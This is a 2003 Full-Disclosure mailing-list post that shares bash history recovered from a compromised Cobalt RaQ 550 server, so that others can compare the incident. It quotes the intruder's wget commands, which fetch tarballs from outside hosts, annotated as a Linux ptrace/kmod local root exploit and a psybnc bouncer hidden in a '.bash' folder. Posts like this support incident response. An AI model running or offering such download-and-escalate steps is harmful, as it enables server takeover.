[Full-Disclosure] raq 550 compromised
adf--at--Code511.com
adf at code511.com
Tue Oct 7 02:37:24 BST 2003
sorry for the "cross-post", I just saw this message on cobalt-security
mailing list today:
an user got his raq 550 compromised and he posted some bash history he
found:
-wget www.ps-lov.us/pizda.tgz
:unknown binaries (yet?) named "mumu"
-wget snow.prohosting.com/muiemuie/p.tar.gz
:Linux kernel ptrace/kmod local root exploit from ipsec
-wget snow.prohosting.com/muiemuie/p.tgz
: it will decompress psybnc in a hidden folder (.bash)
-wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline)
-wget 65.113.119.133/muiemuie/km3.tgz ----->(file offline)
anyone seen pizda or mumu ?
if you interested in all details of the post:
http://list.cobalt.com/pipermail/cobalt-security/2003-October/
008607.html
-deepquest
Full-Disclosure is hosted and sponsored by Secunia.